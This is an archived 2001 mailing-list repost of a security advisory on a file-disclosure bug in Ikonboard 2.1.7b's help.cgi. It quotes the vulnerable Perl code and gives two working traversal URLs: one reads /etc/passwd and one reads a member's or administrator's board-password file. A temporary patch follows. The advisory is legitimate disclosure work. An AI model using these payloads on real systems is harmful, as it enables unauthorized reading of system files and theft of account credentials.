OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Steve (steveSECURESOLUTIONS.ORG)
Date: Mon Mar 12 2001 - 09:04:57 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----Original Message-----
    From: Martin J. Muench
    Subject: Ikonboard v2.1.7b "show files" vulnerability

    -[ Product: Ikonboard
    -[ Version: 2.1.7b
    -[ OS: Unix, NT
    -[ Vendor: Notified, http://www.ikonboard.com

    -=[ Summary ]=-

    This is another bug in the Ikonboard.
    Anyone can read any file on the remote system with
    the privileges of the web server.

    -=[ Problem ]=-

    File: help.cgi

    ---[L.44]---
    $inhelpon = $query -> param('helpon'); 

    ---
As we can see, $inhelpon is the input for 'helpon'

    ---[L.95-97]---
$filetoopen = "$ikondir" . "help/$inhelpon.dat";
$filetoopen = &stripMETA($filetoopen);
open (FILE, "$filetoopen") or die "Cannot locate the required files";
---
Well, it sets the file, runs it through the filter and opens it.
-> $inhelpon, remember?! ;)

    Ok, i am not going to post the whole filter it uses because they really
have
been able to write a filter that is 24 lines long.
And they finally forgot to filter the backslash, so we can easily just
attach the 'poison null-byte' to '$inhelpon' and we escape the '.dat'.
And of course the scripts doesn't check for "..", so we can specifiy
every
path we want.

    -=[ Exploit ]=-

    Example:

    http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../et
c/passwd%00
- would show the password file, if it is readable with the privileges of
the
  web server.

    http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../members/
r>.cgi%00
- replace <member> with the member name and it shows you his/her
board-password.
  (works with Administrator accounts too)

    -=[ Patches ]=-

    Not yet available.
You could fix the script temporary by inserting the following line under
line 45 in 'help.cgi':

    $inhelpon =~ s/\///g;

    This is lame, but it works.

    -=[ Greetings ]=-

    Neilk - learned alot from you!
Marc Ruef - I promised it ;)
DukeCS - thanks for everything!
Marko - thanks for your help!
Tribunal - you taught me alot, thanks
ICB - long time no speak
Svoern - "go get 'em" ;)

    So long,

    Martin J. Muench <muenchgmc-online.de>
http://mjm.gmc-online.de
http://www.german-secure.de

    "Perl - The only language that looks the same before and after RSA
encryption."
- Keith Bostic

    _____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net